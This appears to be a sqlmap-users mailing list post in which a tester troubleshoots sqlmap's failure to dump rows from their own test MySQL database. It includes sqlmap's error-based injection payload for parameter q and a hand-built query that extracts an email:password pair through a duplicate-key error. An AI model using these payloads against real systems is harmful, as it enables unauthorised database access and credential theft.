Hello!
I was playing around with sqlmap at home, and I noticed all of a sudden
that I couldn't get it to extract any columns or rows all of a sudden.
Database names, current users, tables and such works fine, but
extracting any columns with --dump doesn't work, and thus not getting
any rows either. --columns seems to work though, although if I do that
first and then --dump, it still wont work.
Here's some output from sqlmap:
At revision 4654.
[00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test'
on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the number of columns for table
'test' on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the columns for any table on
database 'testDB'
[00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for
table 'test' on database 'testDB'
[00:47:13] [WARNING] the SQL query provided does not return any output
[00:47:13] [INFO] analyzing table dump for possible password hashes
Database: testDB
Table: test
[0 entries]
+----------+----------+
| strTest1 | strTest2 |
+----------+----------+
+----------+----------+
The vulnerability used by sqlmap is the following error based one:
---
Place: GET
Parameter: q
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: q=2) AND (SELECT 2155 FROM(SELECT
COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE
0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039
---
And if I try to extract data manually through my browser, then it works
perfectly:
Notice the extracted data: t...@mail.com:aPassword
Duplicate entry t...@mail.com:aPassword :gtb:1' for key 'group_key'
select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT
COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557)
THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test
GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 =
2) AND (SELECT 2557 FROM(SELECT
COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1
ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY
x)a) AND (8882=8882)
PS: I tried specifying with "-C strTest1,strTest2" as well
Any ideas? :-)
Thanks in advance, and thanks for a great tool (helps me a lot in my
work, and saves me time from having to write my own scripts all the time
to test my software)!
------------------------------------------------------------------------------
Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
infrastructure or vast IT resources to deliver seamless, secure access to
virtual desktops. With this all-in-one solution, easily deploy virtual
desktops for less than the cost of PCs and save 60% on VDI infrastructure
costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
